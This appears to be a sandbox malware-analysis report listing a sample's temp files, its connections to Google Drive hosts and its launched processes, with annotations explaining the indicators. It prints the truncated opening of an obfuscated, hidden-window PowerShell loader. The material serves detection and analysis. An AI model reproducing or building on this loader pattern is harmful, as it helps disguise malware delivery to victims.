Technical Information
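File system activity (the sub-headings of the original report are missing from this copy; the two .tmp paths are listed twice below, possibly once as created and once as deleted, but that cannot be confirmed from this text):
- %TEMP%\aspherical.txt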
- %WINDIR%\temp\cab2240.tmp
- %WINDIR%\temp\tar2241.tmp
- %WINDIR%\temp\cab2240.tmp
- %WINDIR%\temp\tar2241.tmp
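Network activity (connection endpoints, one HTTP request, then DNS queries). The Google Drive hosts are legitimate shared services, so they show where the sample connects but are not usable as block-list indicators on their own; correlate them with the process that made the connection. The '#' in 'pk#.goog' appears to be a character masked by the report generator and is reproduced as published. The request for gsr1.crt looks like a certificate fetch and may be a side effect of TLS validation rather than sample-specific traffic.
- 'drive.google.com':443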
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
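Processes launched. The PowerShell command line is truncated ('...') in the report, so the full script is not shown here. The child process `cmd /c set /A 115^^0` only evaluates an arithmetic expression (`^^` is an escaped `^`, the XOR operator in `set /A`, so the result is 115), which the script stores in $Phylarch. For detection, the observable pattern is a PowerShell process with a hidden window spawning cmd.exe to run `set /A`.
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#demokrats eviggyldigt Tovnings womaning Opsendingen #>;$Phylarch=(cmd /c set /A 115^^0);Function Logaoedic169 ([String]$Coppa){$Kafila=8;$Writerling=Hexacorallan186($Coppa);For($daasernes=7;...' (with hidden window)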
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#demokrats eviggyldigt Tovnings womaning Opsendingen #>;$Phylarch=(cmd /c set /A 115^^0);Function Logaoedic169 ([String]$Coppa){$Kafila=8;$Writerling=Hexacorallan186($Coppa);For($daasernes=7;...
- '<SYSTEM32>\cmd.exe' /c set /A 115^^0